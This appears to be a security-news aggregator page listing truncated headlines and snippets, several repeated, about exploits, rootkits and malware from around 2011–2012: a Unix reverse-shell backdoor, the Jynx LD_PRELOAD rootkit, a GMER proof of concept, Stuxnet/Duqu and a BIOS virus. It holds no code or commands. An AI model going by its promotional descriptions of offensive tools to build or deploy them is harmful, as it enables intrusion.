TCP/IP Invisible Userland Unix Backdoor with Reverse Shell

Exploit for unix platform in category local exploits ============================================ TCP/IP Invisible Userland Unix Backdoor with Reverse Shell ============================================ / \ / \ |\ /| | \ / \ | | / / | | | | | /| | | | / / | | / | | | | | / / | / / | | | | \ \ / /...

Attackers Targeting Windows Media Bug With Malware

Security researchers have seen attackers going after the newly patched CVE-2012-0003 vulnerability in the Windows Media Player. The flaw, which was patched earlier this month by Microsoft, is a critical one that can enable remote code execution, and it affects a wide range of Windows systems. Whe...

超级巡警avtsafe.sys <= 1.0.0.4 本地内核拒绝服务漏洞

超级巡警是专门查杀并可辅助查杀各种木马、流氓软件、利用Rootkit技术的各种后门和其它恶意代码间谍软件、蠕虫病毒等等 超级巡警的驱动avtsafe.sys所有挂钩函数没有任何参数校验 超级巡警avtsafe.sys = 1.0.0.4 暂无，请关注官方补丁 http://www.sucop.com/...

New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot

A security researcher who has in the past has created low-level rootkits capable of staying resident on an infected machine after reboots, said he has now accomplished the same feat on Windows 8, which hasn’t even hit the shelves yet. Peter Kleissner said he has created a new version of his Stone...

Stuxnet 3.0 to be possibility released at MalCon?

Stuxnet 3.0 to be possibility released at MalCon? Malware coders and security researchers are increasingly looking at MalCon malware convention to show-off their latest creations and research. We were pretty shocked to see in a twitter update today from MalCon, that one of the research paper...

Stuxnet 3.0 to be possibility released at MalCon?

Stuxnet 3.0 to be possibility released at MalCon? Malware coders and security researchers are increasingly looking at MalCon malware convention to show-off their latest creations and research. We were pretty shocked to see in a twitter update today from MalCon, that one of the research paper...

TDSS Rootkit and DNSchanger: An Unholy Alliance

The TDSS rootkit has proven to be more pliable and adaptable than a campaigning politician, and attackers have used it in various forms for the last three or four years for all sorts of different attacks. It shows up in drive-by downloads, targeted attacks and just about everything in between, an...

Blackhole Exploit Kit attack on WampServer & Wordpress sites

Blackhole Exploit Kit attack on WampServer & Wordpress sites Kimberly from Stopmalvertising found Blackhole Exploit Kit on Website of most popular Webserver software site WAMPSERVER. Almost at the bottom of the webpage they notice a Javascript requesting a file from jquery.googlecode.com. The URL...

India Seizes Equipment Linked to Duqu Attack

Officials in India have seized components from a server as part of an investigation into the Duqu Trojan, according to a report. According to Reuters, two workers at Web Werks, a web hosting company based in Mumbai, said the country’s Department of Information Technology took the equipment after...

Stuxnet's Son "Duqu" Removal Tool released by Bitdefender

Stuxnet's Son "Duqu" Removal Tool released by Bitdefender Rootkit.Duqu is a new e-threat that combines the technology of the military-grade Stuxnet with an advanced keylogger and backdoor application. Due to its rootkit technology, the piece of malware can stay hidden from the user, the operating...

Stuxnet's Son "Duqu" Removal Tool released by Bitdefender

Stuxnet's Son "Duqu " Removal Tool released by Bitdefender Rootkit.Duqu is a new e-threat that combines the technology of the military-grade Stuxnet with an advanced keylogger and backdoor application. Due to its rootkit technology, the piece of malware can stay hidden from the user, the operatin...

Jynx Kit (LD_PRELOAD) Userland Rootkit Released

Jynx Kit LDPRELOAD Userland Rootkit Released Jynx Kit is a LDPRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LDPRELOAD rootkits...

Jynx Kit (LD_PRELOAD) Userland Rootkit Released

Jynx Kit LDPRELOAD Userland Rootkit Released Jynx Kit is a LDPRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LDPRELOAD rootkits...

Malicious Ads on Bing Lead to ZeroAccess Trojan

Search-engine poisoning has been the bane of many Internet users’ existence for a long time, and it’s one of many security problems that seems to not be getting any better. In some ways, it may be getting worse, actually. One of the main problems these days is the use of legitimate-looking ads th...

New 'Nice Pack' Exploit Kit Found, Thousands of Owned Sites Redirecting Users to Attack Site

A new exploit pack has appeared on the scene in the last week or so and it already is causing trouble for users, with thousands of compromised Web sites redirecting users to a page that is hosting the pack and exploiting vulnerabilities on their machines to install malware. The attackers behind t...

Alureon Rootkit Morphs Again, Adds Steganography

The Alureon rootkit has become not just a major headache for its victims, with its insidious infection routines and persistence once on a machine. But it also has proved to be a challenge for researchers engaged in trying to identify new versions and unwind its new tactics and techniques. The...

GMER 1.0.15.15641 - MFT Overwrite

include include include include include / Program : GMER 1.0.15.15641 Homepage : http://www.gmer.net Discovery : 2011/08/01 Author Contacted : 2011/08/09 Status of vuln : 0day Found by : Heurs This Advisory : Heurs Contact : [email protected] //----- Application description GMER is an application...

GMER 1.0.15.15641 MFT Overwrite

include include include include include / Program : GMER 1.0.15.15641 Homepage : http://www.gmer.net Discovery : 2011/08/01 Author Contacted : 2011/08/09 Status of vuln : 0day Found by : Heurs This Advisory : Heurs Contact : [email protected] //----- Application description GMER is an application...

GMER 1.0.15.15641 MFT Overwrite

Exploit for windows platform in category dos / poc include include include include include / Program : GMER 1.0.15.15641 Homepage : http://www.gmer.net Discovery : 2011/08/01 Author Contacted : 2011/08/09 Status of vuln : 0day Found by : Heurs This Advisory : Heurs Contact : email protected //---...

BIOS based Virus discovered by Chinese Security Firm

BIOS based Virus discovered by Chinese Security Firm A Chinese AV company 360 discovered a new Trojan, the "BMW Virus" also called Mebromi, that can actually infect a computers BIOS: "BMW 360 Security Center virus is the latest catch of a high-risk virus, the virus that infected a chain BIOS...